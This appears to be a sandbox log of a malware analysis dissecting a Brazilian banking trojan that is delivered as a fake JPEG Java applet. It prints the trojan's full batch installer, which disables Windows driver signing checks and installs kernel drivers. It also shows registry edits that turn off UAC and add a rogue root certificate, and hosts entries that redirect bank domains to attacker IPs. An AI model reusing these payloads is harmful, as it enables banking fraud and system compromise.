- kaiuxSandBox $ wget -c http://mundocanibal.uol.com.br/orkut/imagens/hs/barra.jpg
- --2011-05-18 23:55:18-- http://mundocanibal.uol.com.br/orkut/imagens/hs/barra.jpg
- Resolving mundocanibal.uol.com.br... 200.147.32.122, 200.147.0.120, 200.147.0.121, ...
- Connecting to mundocanibal.uol.com.br|200.147.32.122|:80... connected.
- HTTP request sent, awaiting response... 200 OK
- Length: 128035 (125K) [image/jpeg]
- Saving to: `barra.jpg'
- 100%[==============================================================================================================================>] 128,035 68.6K/s in 1.8s
- 2011-05-18 23:55:19 (68.6 KB/s) - `barra.jpg' saved [128035/128035]
- kaiuxSandBox $ file barra.jpg
- barra.jpg: Zip archive data, at least v2.0 to extract
- kaiuxSandBox $
- kaiuxSandBox $
- kaiuxSandBox $ unzip barra.jpg
- Archive: barra.jpg
- inflating: META-INF/MANIFEST.MF
- inflating: META-INF/NOVO.SF
- inflating: META-INF/NOVO.RSA
- inflating: le.class
- inflating: a
- inflating: .project
- inflating: .classpath
- kaiuxSandBox $
- kaiuxSandBox $
- kaiuxSandBox $ strings le.class
- java/applet/Applet
- serialVersionUID
- ConstantValue
- Ljava/lang/String;
- BAR1
- LIN1
- TEM1
- IPPP1
- IPP1
- IPPP2
- IPP2
- VSYS
- VSYS1
- VSYS64
- VSYS164
- BA64
- BAT64
- CMS1
- CMS64
- CMS164
- CMSS
- CMSS1
- CMSS64
- CMSS164
- URLX
- URLX1
- sann
- local_dns
- local_dnss
- dns_goo
- dns_googl
- wifi_dns
- wifi_dnss
- wifi_googl
- wifi_google
- RANDO
- IP_PH1
- IP_PH2
- JUST1
- N_ZIP
- X_ZIP
- BARRA
- PULAR
- TEMPO
- C_LIX
- C_HOST
- C_SYS
- C_SYS64
- C_JAVA
- ST_HOST
- ST_JAVA
- aaaooo
- <clinit>
- Code
- java/lang/String
- <init>
- ([B)V
- LineNumberTable
- LocalVariableTable
- java/lang/Math
- random
- hs_err_pid_0x00001
- java/lang/StringBuilder
- valueOf
- (I)Ljava/lang/String;
- (Ljava/lang/String;)V
- .tmp
- append
- -(Ljava/lang/String;)Ljava/lang/StringBuilder;
- toString
- ()Ljava/lang/String;
- java/lang/System
- getProperty
- &(Ljava/lang/String;)Ljava/lang/String;
- &(Ljava/lang/Object;)Ljava/lang/String;
- WINDOWS
- system32
- drivers
- hosts
- java.home
- security
- java.policy
- this
- Lle;
- paint
- (Ljava/awt/Graphics;)V
- java/awt/Color
- darkGray
- Ljava/awt/Color;
- java/awt/Graphics
- setColor
- (Ljava/awt/Color;)V
- drawString
- (Ljava/lang/String;II)V
- Ljava/awt/Graphics;
- Pausar
- (I)V
- currentTimeMillis
- StackMapTable
- H32A
- '(Ljava/lang/String;Ljava/lang/String;)V
- java/io/File
- exists
- java/net/URL
- openConnection
- ()Ljava/net/URLConnection;
- java/net/URLConnection
- getInputStream
- ()Ljava/io/InputStream;
- java/io/BufferedInputStream
- (Ljava/io/InputStream;)V
- java/io/FileOutputStream
- java/io/BufferedOutputStream
- (Ljava/io/OutputStream;)V
- write
- read
- flush
- close
- java/io/IOException
- URLexterna
- SalvarComo
- files
- Ljava/io/File;
- Ljava/net/URL;
- connection
- Ljava/net/URLConnection;
- stream
- Ljava/io/InputStream;
- Ljava/io/BufferedInputStream;
- file
- Ljava/io/FileOutputStream;
- Ljava/io/BufferedOutputStream;
- java/io/InputStream
- H32C
- HostURL
- H31S
- java/io/FileWriter
- (Ljava/io/File;Z)V
- Local
- Dados
- filewriter
- Ljava/io/FileWriter;
- H32F
- java/io/FileInputStream
- (Ljava/io/File;)V
- java/io/OutputStream
- ([BII)V
- ([B)I
- java/io/FileNotFoundException
- Destino
- Ljava/io/OutputStream;
- H32B
- java/lang/Runtime
- getRuntime
- ()Ljava/lang/Runtime;
- exec
- '(Ljava/lang/String;)Ljava/lang/Process;
- valor
- H24D
- java/lang/Object
- getClass
- ()Ljava/lang/Class;
- java/lang/Class
- getResourceAsStream
- )(Ljava/lang/String;)Ljava/io/InputStream;
- H24Z
- java/util/zip/ZipFile
- entries
- ()Ljava/util/Enumeration;
- java/util/Enumeration
- nextElement
- ()Ljava/lang/Object;
- java/util/zip/ZipEntry
- /(Ljava/util/zip/ZipEntry;)Ljava/io/InputStream;
- getName
- (Ljava/io/OutputStream;I)V
- ([BII)I
- hasMoreElements
- zipname
- xDir
- zipFile
- Ljava/util/zip/ZipFile;
- enumeration
- Ljava/util/Enumeration;
- zipEntry
- Ljava/util/zip/ZipEntry;
- size
- buffer
- os.name
- Windows
- contains
- (Ljava/lang/CharSequence;)Z
- ProgramFiles(x86)
- getenv
- os.arch
- indexOf
- (Ljava/lang/String;)I
- eh64
- FFexists
- user.home
- endsWith
- (Ljava/lang/String;)Z
- Application Data
- Mozilla
- Firefox
- Dados de aplicativos
- AppData
- Roaming
- profiles.ini
- GetFFdir
- java/lang/Exception
- U_HOME
- STR1
- STR2
- STR3
- arq1
- arq2
- arq3
- java/io/DataInputStream
- java/io/BufferedReader
- java/io/InputStreamReader
- (Ljava/io/Reader;)V
- Path=(.*)
- java/util/regex/Pattern
- compile
- -(Ljava/lang/String;)Ljava/util/regex/Pattern;
- matcher
- 3(Ljava/lang/CharSequence;)Ljava/util/regex/Matcher;
- java/util/regex/Matcher
- find
- group
- replace
- (CC)Ljava/lang/String;
- cert_override.txt
- readLine
- Where
- fstream
- Ljava/io/FileInputStream;
- Ljava/io/DataInputStream;
- Ljava/io/BufferedReader;
- strLine
- Filtrar
- Ljava/util/regex/Pattern;
- Buscar
- Ljava/util/regex/Matcher;
- ProfilesDIR
- toLowerCase
- windows 7
- Windows7
- windows vista
- WindowsVista
- windows xp
- WindowsXP
- windows nt
- WindowsNT
- H922
- ((Ljava/lang/String;Ljava/lang/Boolean;)V
- java/lang/Boolean
- booleanValue
- Ccmd /c %tmp%\bcdedit.exe -set loadoptions DDISABLE_INTEGRITY_CHECKS
- ,cmd /c %tmp%\bcdedit.exe -set TESTSIGNING ON
- cmd /c del %tmp%\aaa.bat
- estrutura
- Ljava/lang/Boolean;
- init
- windows
- ,cmd /c mkdir c:\windows\syswow64\drivers\etc
- (Z)Ljava/lang/Boolean;
- &estrutura=
- (Z)Ljava/lang/StringBuilder;
- SourceFile
- le.java
- kaiuxSandBox $ file a
- a: Zip archive data, at least v2.0 to extract
- kaiuxSandBox $
- kaiuxSandBox $
- kaiuxSandBox $
- kaiuxSandBox $
- kaiuxSandBox $
- kaiuxSandBox $ unzip a
- Archive: a
- inflating: plusdriver.sys
- inflating: plusdriver64.sys
- inflating: aaa.bat
- inflating: add.reg
- inflating: bcdedit.exe
- inflating: cert_override.txt
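- ##### Interesting findings in plusdriver.sys: a PDB build path, then hosts-file style entries pointing two bank hostnames at 216.155.133.236 and 216.155.133.237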
- c:\sys\32\objchk_wxp_x86\i386\ag02.pdb
- 216.155.133.236 www2.bancobrasil.com.br
- 216.155.133.237 aapj.bb.com.br
- 127.0.0.1 localhost
- Hosts doWindows
- Exemplo:
- 127.0.0.1 www.microsof.com.br
- RtlInitUnicodeString
- kaiuxSandBox $
- kaiuxSandBox $ cat aaa.bat
- @echo off
- @break off
- cmd /c %tmp%\\bcdedit.exe -set loadoptions DDISABLE_INTEGRITY_CHECKS
- cmd /c %tmp%\\bcdedit.exe -set TESTSIGNING ON
- cmd /c copy %tmp%\\plusdriver64.sys %windir%\\SysWOW64\\drivers
- cmd /c copy %tmp%\\plusdriver.sys %windir%\\System32\\drivers
- cmd /c sc create driverusbplus64 binPath= "SysWOW64\drivers\plusdriver64.sys" group= "Act Plus Group" type= kernel start= boot error= normal DisplayName= "driverusbplus64"
- cmd /c sc create driverusbplus binPath= "System32\drivers\plusdriver.sys" group= "Act Plus Group" type= kernel start= boot error= normal DisplayName= "driverusbplus"
- cmd /c del %tmp%\\aaa.bat
- cmd /c del %tmp%\\plusdriver64.sys
- cmd /c del %tmp%\\plusdriver.sys
- cmd /c del %tmp%\\add.reg
- cmd /c del %tmp%\\bcdedit.exe
- cmd /c del %tmp%\\cert_override.txt
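- ##### Trying to change the root cert? add.reg sets EnableLUA to 0 (UAC off) and writes a certificate blob under SystemCertificates\AuthRoot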
- kaiuxSandBox $ cat add.reg
- .....
- [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System]
- "EnableLUA"=dword:00000000
- [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\26ED6B892DA143F2A6B9E036C5CDDF85CBC0765D]
- "Blob"=hex:04,00,00,00,01,00,00,00,10,00,00,00,77,b4,55,9c,b0,8a,a6,19,b8,8b,\
- .....